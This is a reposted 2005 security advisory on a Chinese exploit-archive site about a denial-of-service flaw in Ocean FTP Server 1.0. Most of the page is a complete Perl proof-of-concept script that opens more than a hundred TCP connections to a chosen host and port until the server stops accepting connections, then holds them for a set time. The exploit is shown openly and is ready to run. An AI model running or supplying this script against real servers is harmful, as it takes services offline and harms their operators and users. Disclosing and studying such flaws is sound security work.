首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Ocean FTP DoS (Exploit)
来源:www.gssit.co.il 作者:GSS-IT 发布时间:2005-03-24  

Ocean FTP DoS (Exploit)

Summary
Ocean FTP Server "incorporates many advanced features, all of which are accessible through an easy to use interface".

A remote user can open approximately 106 simultaneous connections from the same host to cause the Ocean FTP server to stop accepting connections.

Credit:
The information has been provided by GSS IT.

Details
Vulnerable Systems:
* Ocean FTP Server version 1.0

Immune Systems:
* Ocean FTP Server version 1.01

Exploit
#!/usr/bin/perl
###############################
# GSS-IT Research And Security Labs #
###############################
# #
# www.gssit.co.il #
# #
###############################
# Ocean FTP Server Ver 1.00 Denial Of Service POC #
###############################
# Use This PoC For Educational Purposes Only #
###############################


use Socket;

if (($#ARGV) < 2)
{
print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n\n");
print("Use : \n\nperl $0 [Host] [Port] [Sleep] \n");
exit
}

print("#############################\n");
print("# Ocean FTP Server Ver 1.00 Denial Of Service POC #\n");
print("#############################\n");


$host = $ARGV[0];
$port = $ARGV[1];
$slp = $ARGV[2];
$proto = getprotobyname('tcp');


for ($i=1; $i<110; $i++)
{
socket($i, PF_INET, SOCK_STREAM, $proto );
$dest = sockaddr_in ($port, inet_aton($host));
if (!(connect($i, $dest)))
{
Slp();
}

}

print("==> Unsuccesful <==");
exit;


sub Slp

{

print("\n\nServer $host Has Been Successfully DoS'ed\n\n");
print("The Server Will Be Down For $slp Seconds\n\n");
sleep ($slp);

print("==> Killing Connections ...<==\n");
for ($j=1; $j<110; $j++)
{
shutdown($j,2);
}
print ("[#] Back To Work Server Up [#] ");
exit;
}

EOF



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·phpBB UID Exploit (Perl Exploi
·MailEnable Format String Vulne
·FreeCiv Server DoS Exploit
·Microsoft Windows WAB DoS
·MCPWS Personal DoS Exploit
·LimeWire File Disclosure Explo
·Linux Kernel 2.4.x / 2.6.x use
·OpenMosixView Multiple Race Co
·Linux Kernel <= 2.6.11 sys_
·Tincat Buffer Overflow
·Apple Core Foundation Library
·Smail preparse_address_1() Hea
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved